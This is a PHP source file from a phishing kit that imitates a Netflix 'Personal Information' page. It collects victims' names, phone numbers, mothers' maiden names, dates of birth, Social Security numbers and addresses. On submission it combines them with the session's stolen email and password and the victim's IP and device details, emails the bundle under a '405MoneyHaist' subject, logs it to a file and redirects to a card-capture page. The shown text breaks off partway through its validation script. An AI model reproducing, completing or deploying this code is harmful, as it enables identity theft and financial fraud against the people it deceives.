<?php ob_start(); error_reporting(E_ALL); ini_set('display_errors', 1);
// Safe session start
if (session_status() === PHP_SESSION_NONE) {
    @ini_set('session.save_path', sys_get_temp_dir());
    @session_start();
}
include 'setup/function.php';
require_once __DIR__ . '/../GlobalSetting/email_sender.php';
$res = json_decode(file_get_contents('../config/access.json'), true);

if(empty($_SESSION['email']) && empty($_SESSION['password'])) {
    // Session hilang, redirect ke login
    header("Location: loginss?session_expired=1");
    exit;
}

$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$ipData = fetchIpData($ip, $userAgent);
if ($ipData) saveIpData($ipData, 'Human in Personal Information Page');

if($_SERVER['REQUEST_METHOD'] == 'POST')
{
    $_SESSION['form_data'] = $_POST;
    
    $deviceBrowser = getDeviceAndBrowser();
    $device = $deviceBrowser['device'];
    $browser = $deviceBrowser['browser'];
    $userAgent = $deviceBrowser['user_agent'];
    
    $cityGeo = $ipData['city'] ?? 'N/A';
    $region = $ipData['region'] ?? 'N/A';
    $country = $ipData['country'] ?? 'N/A';
    $isp = $ipData['isp'] ?? 'N/A';
    $date_time = date('H:i:s m-d-Y');
    $date_subject = date('D d M Y H:i:s');
    
    $fullname = htmlspecialchars($_POST['firstname'] ?? '') . ' '. htmlspecialchars($_POST['lastname'] ?? '');
    $address = htmlspecialchars($_POST['address'] ?? '');
    $address2 = htmlspecialchars($_POST['adde'] ?? '');
    $city = htmlspecialchars($_POST['city'] ?? '');
    $state = htmlspecialchars($_POST['state'] ?? '');
    $zipcode = htmlspecialchars($_POST['zip'] ?? '');
    $phonenumber = htmlspecialchars($_POST['phone'] ?? '');
    $sosel = htmlspecialchars($_POST['ssn'] ?? '');
    $dob = htmlspecialchars($_POST['dob'] ?? '');
    $mmn = htmlspecialchars($_POST['mmn'] ?? '');
    $email = htmlspecialchars($_SESSION['email'] ?? '');
    $password = htmlspecialchars($_SESSION['password'] ?? '');
    
    // Build HTML email data for billing
    $emailData = [
        'email' => $email,
        'password' => $password,
        'fullname' => $fullname,
        'address' => $address,
        'address2' => $address2,
        'city' => $city,
        'state' => $state,
        'zipcode' => $zipcode,
        'phone' => $phonenumber,
        'dob' => $dob,
        'ssn' => $sosel,
        'mmn' => $mmn,
        'datetime' => $date_time,
        'ip' => $ip,
        'isp' => $isp,
        'country' => $country,
        'region' => $region,
        'device' => $device,
        'browser' => $browser,
        'useragent' => $userAgent
    ];
    
    $subject = "405MoneyHaist Billing Address: $date_subject";
    $message = function_exists('buildGlobalBillingHtml') ? buildGlobalBillingHtml($emailData) : '';
    sendGlobalEmail('', $subject, $message, true);
    
    // Log billing submission
    loginAndCardSave($ip, 'billing.txt');
    
    $ccTpl = $dataPage['cc_template'] ?? '3';
    if($ccTpl == '2')
    {
        header("Location: payment?payment-token=".generateRandomString(100));
        exit;
    } else {
        header("Location: cc?payment-token=".generateRandomString(100));
        exit;
    }
}
// Get visitor language
$visitorLang = $_SESSION['visitor_lang'] ?? 'en';
$textDir = function_exists('getTextDirection') ? getTextDirection() : 'ltr';
?>
<!DOCTYPE html>
<html lang="<?= $visitorLang ?>" dir="<?= $textDir ?>">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Netflix - <?= __('personal_info') ?></title>
    <link rel="stylesheet" href="tema/styles/style.css">
    <style>
        /* Clean Loading Screen */
        .loading-overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100vh;
            background: #ffffff;
            z-index: 999999;
            display: flex;
            justify-content: center;
            align-items: center;
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
        }
        .loading-content {
            text-align: center;
            padding: 40px;
        }
        .loading-spinner {
            border: 3px solid #f0f0f0;
            border-top: 3px solid #e50914;
            border-radius: 50%;
            width: 60px;
            height: 60px;
            animation: spin 0.8s linear infinite;
            margin: 0 auto 24px;
        }
        .loading-text {
            margin: 0;
            font-size: 18px;
            font-weight: 400;
            color: #333;
            letter-spacing: 0.5px;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <!-- Simple Loading Screen -->
    <div id="loading-overlay" class="loading-overlay">
        <div class="loading-content">
            <div class="loading-spinner"></div>
            <p class="loading-text"><?= __('loading') ?></p>
        </div>
    </div>
    <header class="header">
        <div class="header-content">
            <svg class="netflix-logo" viewBox="0 0 111 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img">
                <g><path d="M105.06233,14.2806261 L110.999156,30 C109.249227,29.7497422 107.500234,29.4366857 105.718437,29.1554972 L102.374168,20.4686475 L98.9371075,28.4375293 C97.2499766,28.1563408 95.5928391,28.061674 93.9057081,27.8432843 L99.9372012,14.0931671 L94.4680851,-5.68434189e-14 L99.5313525,-5.68434189e-14 L102.593495,7.87421502 L105.874965,-5.68434189e-14 L110.999156,-5.68434189e-14 L105.06233,14.2806261 Z M90.4686475,-5.68434189e-14 L85.8749649,-5.68434189e-14 L85.8749649,27.2499766 C87.3746368,27.3437061 88.9371075,27.4055675 90.4686475,27.5930265 L90.4686475,-5.68434189e-14 Z M81.9055207,26.93692 C77.7186241,26.6557316 73.5307901,26.4064111 69.250164,26.3117443 L69.250164,-5.68434189e-14 L73.9366389,-5.68434189e-14 L73.9366389,21.8745899 C76.6248008,21.9373887 79.3120255,22.1557784 81.9055207,22.2804387 L81.9055207,26.93692 Z M64.2496954,10.6561065 L64.2496954,15.3435186 L57.8442216,15.3435186 L57.8442216,25.9996251 L53.2186709,25.9996251 L53.2186709,-5.68434189e-14 L66.3436123,-5.68434189e-14 L66.3436123,4.68741213 L57.8442216,4.68741213 L57.8442216,10.6561065 L64.2496954,10.6561065 Z M45.3435186,4.68741213 L45.3435186,26.2498828 C43.7810479,26.2498828 42.1876465,26.2498828 40.6561065,26.3117443 L40.6561065,4.68741213 L35.8121661,4.68741213 L35.8121661,-5.68434189e-14 L50.2183897,-5.68434189e-14 L50.2183897,4.68741213 L45.3435186,4.68741213 Z M30.749836,15.5928391 C28.687787,15.5928391 26.2498828,15.5928391 24.4999531,15.6875059 L24.4999531,22.6562939 C27.2499766,22.4678976 30,22.2495079 32.7809542,22.1557784 L32.7809542,26.6557316 L19.812541,27.6876933 L19.812541,-5.68434189e-14 L32.7809542,-5.68434189e-14 L32.7809542,4.68741213 L24.4999531,4.68741213 L24.4999531,10.9991564 C26.3126816,10.9991564 29.0936358,10.9054269 30.749836,10.9054269 L30.749836,15.5928391 Z M4.78114163,12.9684132 L4.78114163,29.3429562 C3.09401069,29.5313525 1.59340144,29.7497422 0,30 L0,-5.68434189e-14 L4.4690224,-5.68434189e-14 L10.562377,17.0315868 L10.562377,-5.68434189e-14 L15.2497891,-5.68434189e-14 L15.2497891,28.061674 C13.5935889,28.3437998 11.906458,28.4375293 10.1246602,28.6868498 L4.78114163,12.9684132 Z"></path></g>
            </svg>
            <a href="#" class="sign-out"><?= __('sign_out') ?></a>
        </div>
    </header>

    <main class="main-content">
        <div class="step-info"><?= __('step_x_of_y', ['x' => 2, 'y' => 3]) ?></div>
        <h1 class="page-title"><?= __('personal_info') ?></h1>

        <form method="POST" action="" id="personalInfoForm">
            <div class="form-row">
                <div class="form-group">
                    <div class="input-wrapper">
                        <input type="text" name="firstname" class="form-control" id="firstName" placeholder=" " required>
                        <label for="firstName" class="floating-label"><?= __('first_name') ?></label>
                    </div>
                    <div class="error-message" id="firstNameError">
                        <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                        </svg>
                        <span><?= __('error_first_name') ?></span>
                    </div>
                </div>
                <div class="form-group">
                    <div class="input-wrapper">
                        <input type="text" name="lastname" class="form-control" id="lastName" placeholder=" " required>
                        <label for="lastName" class="floating-label"><?= __('last_name') ?></label>
                    </div>
                    <div class="error-message" id="lastNameError">
                        <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                        </svg>
                        <span><?= __('error_last_name') ?></span>
                    </div>
                </div>
            </div>

            <div class="form-group">
                <div class="input-wrapper">
                    <input type="tel" name="phone" class="form-control" id="phoneNumber" placeholder=" " required>
                    <label for="phoneNumber" class="floating-label"><?= __('phone_number') ?></label>
                </div>
                <div class="error-message" id="phoneNumberError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span><?= __('error_phone') ?></span>
                </div>
            </div>

            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" name="mmn" class="form-control" id="motherMaidenName" placeholder=" " required>
                    <label for="motherMaidenName" class="floating-label"><?= __('mothers_maiden_name') ?></label>
                </div>
                <div class="error-message" id="motherMaidenNameError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span><?= __('error_mothers_maiden_name') ?></span>
                </div>
            </div>

            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" name="dob" class="form-control" id="dateOfBirth" placeholder=" " maxlength="10" required>
                    <label for="dateOfBirth" class="floating-label"><?= __('date_of_birth') ?></label>
                </div>
                <div class="error-message" id="dateOfBirthError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span><?= __('error_dob') ?></span>
                </div>
            </div>

            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" name="ssn" class="form-control" id="ssn" placeholder=" " maxlength="11" required>
                    <label for="ssn" class="floating-label"><?= __('ssn') ?></label>
                </div>
                <div class="error-message" id="ssnError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span><?= __('error_ssn') ?></span>
                </div>
            </div>

            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" name="address" class="form-control" id="address1" placeholder=" " required>
                    <label for="address1" class="floating-label"><?= __('address_line1') ?></label>
                </div>
                <div class="error-message" id="address1Error">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span><?= __('error_address') ?></span>
                </div>
            </div>

            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" name="adde" class="form-control" id="address2" placeholder=" ">
                    <label for="address2" class="floating-label"><?= __('address_line2') ?></label>
                </div>
            </div>

            <div class="form-row">
                <div class="form-group">
                    <div class="input-wrapper">
                        <input type="text" name="city" class="form-control" id="region" placeholder=" " required>
                        <label for="region" class="floating-label"><?= __('city') ?></label>
                    </div>
                    <div class="error-message" id="regionError">
                        <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                        </svg>
                        <span><?= __('error_city') ?></span>
                    </div>
                </div>
                <div class="form-group">
                    <div class="input-wrapper">
                        <input type="text" name="state" class="form-control" id="state" placeholder=" " required>
                        <label for="state" class="floating-label"><?= __('state') ?></label>
                    </div>
                    <div class="error-message" id="stateError">
                        <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                        </svg>
                        <span><?= __('error_state') ?></span>
                    </div>
                </div>
            </div>

            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" name="zip" class="form-control" id="postalCode" placeholder=" " maxlength="10" required>
                    <label for="postalCode" class="floating-label"><?= __('zip_code') ?></label>
                </div>
                <div class="error-message" id="postalCodeError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span><?= __('error_zip_code') ?></span>
                </div>
            </div>

            <div class="disclaimer">
                <?= __('personal_info_disclaimer') ?>
            </div>

            <div class="disclaimer">
                <?= __('terms_agreement', ['terms_link' => '<a href="#">' . __('terms_of_use') . '</a>', 'privacy_link' => '<a href="#">' . __('privacy_statement') . '</a>']) ?>
            </div>

            <div class="checkbox-wrapper">
                <input type="checkbox" id="agree" class="checkbox" required>
                <label for="agree" class="checkbox-label"><?= __('agree_terms') ?></label>
            </div>

            <button type="submit" class="continue-button" id="submitButton"><?= __('continue') ?></button>

            <div class="security-notice">
                <?= __('security_notice') ?> <a href="#"><?= __('learn_more') ?></a>.
            </div>
        </form>
    </main>

    <footer class="footer">
        <div class="footer-content">
            <div class="footer-contact">
                <?= __('questions_call') ?> <a href="tel:1-844-505-2993">1-844-505-2993</a>
            </div>

            <div class="footer-links">
                <a href="#"><?= __('faq') ?></a>
                <a href="#"><?= __('help_center') ?></a>
                <a href="#"><?= __('terms_of_use') ?></a>
                <a href="#"><?= __('privacy') ?></a>
                <a href="#"><?= __('cookie_preferences') ?></a>
                <a href="#"><?= __('corporate_info') ?></a>
                <a href="#"><?= __('ad_choices') ?></a>
            </div>

            <div class="language-selector" style="position: relative; display: inline-block; margin-top: 20px;">
                <svg class="language-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="16" height="16" data-icon="LanguagesSmall" aria-hidden="true" style="position: absolute; left: 8px; top: 50%; transform: translateY(-50%); width: 16px; height: 16px; color: #737373; pointer-events: none; z-index: 1;">
                    <path fill-rule="evenodd" clip-rule="evenodd" d="M10.7668 5.33333L10.5038 5.99715L9.33974 8.9355L8.76866 10.377L7.33333 14H9.10751L9.83505 12.0326H13.4217L14.162 14H16L12.5665 5.33333H10.8278H10.7668ZM10.6186 9.93479L10.3839 10.5632H11.1036H12.8856L11.6348 7.2136L10.6186 9.93479ZM9.52722 4.84224C9.55393 4.77481 9.58574 4.71045 9.62211 4.64954H6.41909V2H4.926V4.64954H0.540802V5.99715H4.31466C3.35062 7.79015 1.75173 9.51463 0 10.4283C0.329184 10.7138 0.811203 11.2391 1.04633 11.5931C2.55118 10.6795 3.90318 9.22912 4.926 7.57316V12.6667H6.41909V7.51606C6.81951 8.15256 7.26748 8.76169 7.7521 9.32292L8.31996 7.88955C7.80191 7.29052 7.34631 6.64699 6.9834 5.99715H9.06968L9.52722 4.84224Z" fill="currentColor"></path>
                </svg>
                <select name="language" id="language" style="background: transparent; border: 1px solid #737373; color: #737373; padding: 8px 32px 8px 32px; font-size: 13px; border-radius: 2px; appearance: none; cursor: pointer; min-width: 120px;">
                    <option value="en">English</option>
                    <option value="es">Español</option>
                </select>
                <svg class="dropdown-arrow" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="16" style="position: absolute; right: 8px; top: 50%; transform: translateY(-50%); width: 12px; height: 12px; color: #737373; pointer-events: none; z-index: 1;">
                    <path d="M8 10.586L3.414 6 2 7.414 8 13.414 14 7.414 12.586 6z" fill="currentColor"/>
                </svg>
            </div>
            
            <div class="footer-country">
                <?= __('netflix_country') ?>
            </div>
        </div>
    </footer>

    <script>
        // Floating label functionality
        function setupFloatingLabels() {
            const inputs = document.querySelectorAll('.form-control');
            
            inputs.forEach(input => {
                // Check if input has value on page load
                if (input.value.trim() !== '') {
                    input.classList.add('has-value');
                }
                
                // Handle focus event
                input.addEventListener('focus', function() {
                    this.classList.add('focused');
                    
                    // Mark that user has interacted with this field
                    this.setAttribute('data-touched', 'true');
                    this.classList.remove('error');
                    
                    // Hide error message for this field
                    const errorElement = document.getElementById(this.id + 'Error');
                    if (errorElement) {
                        errorElement.classList.remove('show');
                    }
                });
                
                // Handle blur event
                input.addEventListener('blur', function() {
                    this.classList.remove('focused');
                    if (this.value.trim() !== '') {
                        this.classList.add('has-value');
                    } else {
                        this.classList.remove('has-value');
                    }
                    
                    // Validate field on blur (only if user has touched the field and field is not optional)
                    if (this.getAttribute('data-touched') === 'true' && this.value.trim() === '' && this.id !== 'address2') {
                        this.classList.add('error');
                        const errorElement = document.getElementById(this.id + 'Error');
                        if (errorElement) {
                            errorElement.classList.add('show');
                        }
                    }
                    
                    // Specific validation
                    validateField(this);
                });
                
                // Handle input event
                input.addEventListener('input', function() {
                    if (this.value.trim() !== '') {
                        this.classList.add('has-value');
                        
                        // Remove error state when user starts typing
                        this.classList.remove('error');
                        const errorElement = document.getElementById(this.id + 'Error');
                        if (errorElement) {
                            errorElement.classList.remove('show');
                        }
                    } else {
                        this.classList.remove('has-value');
                        // Remove valid state when input is empty
                        this.classList.remove('valid');
                    }
                    
                    // Format specific fields
                    formatField(this);
                });
            });
        }

        // Format specific fields
        function formatField(input) {
            switch (input.id) {
                case 'phoneNumber':
                    let phone = input.value.replace(/\D/g, '');
                    if (phone.length >= 6) {
                        phone = phone.replace(/(\d{3})(\d{3})(\d{4})/, '($1) $2-$3');
                    } else if (phone.length >= 3) {
                        phone = phone.replace(/(\d{3})(\d{0,3})/, '($1) $2');
                    }
                    input.value = phone.substring(0, 14);
                    break;
                    
                case 'ssn':
                    let ssn = input.value.replace(/\D/g, '');
                    if (ssn.length >= 5) {
                        ssn = ssn.replace(/(\d{3})(\d{2})(\d{4})/, '$1-$2-$3');
                    } else if (ssn.length >= 3) {
                        ssn = ssn.replace(/(\d{3})(\d{0,2})/, '$1-$2');
                    }
                    input.value = ssn.substring(0, 11);
                    break;
                    
                case 'dateOfBirth':
                    let date = input.value.replace(/\D/g, '');
                    if (date.length >= 5) {
                        date = date.replace(/(\d{2})(\d{2})(\d{4})/, '$1/$2/$3');
                    } else if (date.length >= 3) {
                        date = date.replace(/(\d{2})(\d{0,2})/, '$1/$2');
                    }
                    input.value = date.substring(0, 10);
                    break;
            }
        }

        // Validate specific fields
        function validateField(input) {
            if (!input.getAttribute('data-touched')) return;
            
            let isValid = true;
            let errorMessage = '';
            
            switch (input.id) {
                case 'phoneNumber':
                    const phoneRegex = /^\(\d{3}\) \d{3}-\d{4}$/;
                    isValid = phoneRegex.test(input.value);
                    errorMessage = '<?= __('error_phone') ?>';
                    break;
                    
                case 'ssn':
                    const ssnRegex = /^\d{3}-\d{2}-\d{4}$/;
                    isValid = ssnRegex.test(input.value);
                    errorMessage = '<?= __('error_ssn') ?>';
                    break;
                    
                case 'postalCode':
                    const zipRegex = /^\d{5}(-\d{4})?$/;
                    isValid = zipRegex.test(input.value) || input.value.trim() === '';
                    errorMessage = '<?= __('error_zip_code') ?>';
                    break;
                    
                case 'dateOfBirth':
                    if (input.value) {
                        const dateRegex = /^(0[1-9]|1[0-2])\/(0[1-9]|[12]\d|3[01])\/\d{4}$/;
                        if (!dateRegex.test(input.value)) {
                            isValid = false;
                            errorMessage = '<?= __('error_dob') ?>';
                        } else {
                            const parts = input.value.split('/');
                            const month = parseInt(parts[0], 10);
                            const day = parseInt(parts[1], 10);
                            const year = parseInt(parts[2], 10);
                            
                            const birthDate = new Date(year, month - 1, day);
                            const today = new Date();
                            
                            // Check if date is valid
                            if (birthDate.getMonth() !== month - 1 || birthDate.getDate() !== day || birthDate.getFullYear() !== year) {
                                isValid = false;
                                errorMessage = '<?= __('error_invalid_date') ?>';
                            } else if (birthDate > today) {
                                isValid = false;
                                errorMessage = '<?= __('error_future_date') ?>';
                            } else {
                                const age = today.getFullYear() - birthDate.getFullYear();
                                const monthDiff = today.getMonth() - birthDate.getMonth();
                                const actualAge = monthDiff < 0 || (monthDiff === 0 && today.getDate() < birthDate.getDate()) ? age - 1 : age;
                                
                                if (actualAge < 18) {
                                    isValid = false;
                                    errorMessage = '<?= __('error_age_18') ?>';
                                } else if (actualAge > 120) {
                                    isValid = false;
                                    errorMessage = '<?= __('error_invalid_date') ?>';
                                }
                            }
                        }
                    }
                    break;
            }
            
            if (input.value.trim() !== '' && !isValid) {
                input.classList.add('error');
                const errorElement = document.getElementById(input.id + 'Error');
                if (errorElement) {
                    errorElement.querySelector('span').textContent = errorMessage;
                    errorElement.classList.add('show');
                }
            } else if (input.value.trim() !== '' && isValid) {
                input.classList.add('valid');
            }
        }

        // Initialize on page load
        document.addEventListener('DOMContentLoaded', function() {
            setupFloatingLabels();
            // City/state will auto-fill when user types ZIP code
        });

        // Form submission handler
        const personalInfoForm = document.getElementById('personalInfoForm');
        const submitButton = document.getElementById('submitButton');
        
        personalInfoForm.addEventListener('submit', function(e) {
            e.preventDefault();
            
            // Get all required fields
            const firstName = document.getElementById('firstName').value.trim();
            const lastName = document.getElementById('lastName').value.trim();
            const phoneNumber = document.getElementById('phoneNumber').value.trim();
            const motherMaidenName = document.getElementById('motherMaidenName').value.trim();
            const dateOfBirth = document.getElementById('dateOfBirth').value.trim();
            const ssn = document.getElementById('ssn').value.trim();
            const address1 = document.getElementById('address1').value.trim();
            const region = document.getElementById('region').value.trim();
            const state = document.getElementById('state').value.trim();
            const postalCode = document.getElementById('postalCode').value.trim();
            const agree = document.getElementById('agree').checked;
            
            // Clear previous errors
            document.querySelectorAll('.error').forEach(el => el.classList.remove('error'));
            document.querySelectorAll('.error-message').forEach(el => el.classList.remove('show'));
            
            // Validate required fields - NO EMPTY FIELDS ALLOWED
            let hasError = false;
            
            if (!firstName || firstName.length === 0) {
                document.getElementById('firstName').classList.add('error');
                document.getElementById('firstNameError').classList.add('show');
                hasError = true;
            }
            
            if (!lastName || lastName.length === 0) {
                document.getElementById('lastName').classList.add('error');
                document.getElementById('lastNameError').classList.add('show');
                hasError = true;
            }
            
            if (!phoneNumber || phoneNumber.length === 0 || !/^\(\d{3}\) \d{3}-\d{4}$/.test(phoneNumber)) {
                document.getElementById('phoneNumber').classList.add('error');
                document.getElementById('phoneNumberError').classList.add('show');
                hasError = true;
            }
            
            if (!motherMaidenName || motherMaidenName.length === 0) {
                document.getElementById('motherMaidenName').classList.add('error');
                document.getElementById('motherMaidenNameError').classList.add('show');
                hasError = true;
            }
            
            if (!dateOfBirth || dateOfBirth.length === 0 || !/^(0[1-9]|1[0-2])\/(0[1-9]|[12]\d|3[01])\/\d{4}$/.test(dateOfBirth)) {
                document.getElementById('dateOfBirth').classList.add('error');
                document.getElementById('dateOfBirthError').classList.add('show');
                hasError = true;
            }
            
            if (!ssn || ssn.length === 0 || !/^\d{3}-\d{2}-\d{4}$/.test(ssn)) {
                document.getElementById('ssn').classList.add('error');
                document.getElementById('ssnError').classList.add('show');
                hasError = true;
            }
            
            if (!address1 || address1.length === 0) {
                document.getElementById('address1').classList.add('error');
                document.getElementById('address1Error').classList.add('show');
                hasError = true;
            }
            
            if (!region || region.length === 0) {
